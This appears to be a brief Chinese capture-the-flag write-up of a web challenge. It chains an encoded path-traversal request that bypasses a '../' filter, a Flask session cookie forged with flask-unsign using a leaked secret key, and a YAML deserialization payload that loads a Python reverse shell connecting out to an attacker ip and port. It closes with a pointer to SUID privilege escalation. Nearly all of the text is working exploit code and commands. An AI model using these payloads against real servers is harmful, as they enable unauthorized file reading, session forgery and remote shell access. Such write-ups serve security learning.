path.join任意文件读取将…/替换为空 只要双写一下即可 …/./读取 /etc/hosts
GET
/%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F
%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F
%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F
%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F
%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F
%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F
%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2Fe
tc%2Fhosts HTTP/1.1
那么SECRET_KEY就是engine-1
设置user为Administrator,updir为.
flask-unsign --sign --cookie "{'updir': '.', 'user': 'Administrator'}" --secret "engine-1"
得到
eyJ1cGRpciI6Ii4iLCJ1c2VyIjoiQWRtaW5pc3RyYXRvciJ9.Ywgw4A.brsFEnZSsrp8
6IQFbvHjdwRVkPg
替换cookie
本地写一个c4d038b4bed09fdb1471ef51ec3a32cd.yaml
c4d038b4bed09fdb1471ef51ec3a32cd即为md5(“114514”)
内容为
!!python/object/new:bytes
- !!python/object/new:map
- !!python/name:__import__
- ["fileinfo.a"]
在写一个a.py 内容为
import
os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.du
p2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
打包两个文件为fileinfo.rar
上传fileinfo.rar,然后/display?file=114514 就能弹到shell
接着suid提权即可
